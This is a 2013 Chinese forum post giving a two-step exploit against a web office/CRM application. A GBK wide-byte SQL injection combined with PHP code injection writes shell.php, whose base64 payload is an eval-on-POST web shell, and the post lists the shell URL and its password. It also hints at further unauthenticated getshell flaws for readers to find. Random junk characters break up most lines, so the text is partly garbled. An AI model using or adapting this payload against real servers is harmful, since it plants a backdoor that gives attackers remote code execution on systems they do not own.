此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
. E. [& H7 a& |# _; _& I0 \( j( Z- I! B+ m3 S, W5 f8 N; n% s5 @
2 r" d* p( `, z/ JEXP:
6 T# y( n; `: f
( \; V7 A2 k0 w* M6 b5 c第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}9 O# o$ M& {: Z9 ]
. _/ m, G0 c! ~& Y: z
第二步: [GET]http://site/general/email/index.php$ ?% N3 o) @; {
3 A3 K0 l4 b% t/ x1 J* A
SHELL: http://site/general/email/shell.php 密码C9 ]" j5 |2 y+ @* m5 b3 B) \
: ~; m- j+ M8 P% C$ Y% y / |% e9 d! ]5 c1 m' _# o( K% x
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好; c6 t" O" x* U, Y5 U6 P" S" b
- p5 B8 ]6 j# a- I- Q/ ]" e) f1 \
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~; }4 q- x0 m4 F0 N2 g0 ^
; E6 K. Q9 J9 y' [( p
: F* c! d/ f3 z S4 ?& | |
发表于 2013-2-4 16:19:29
收藏
支持
反对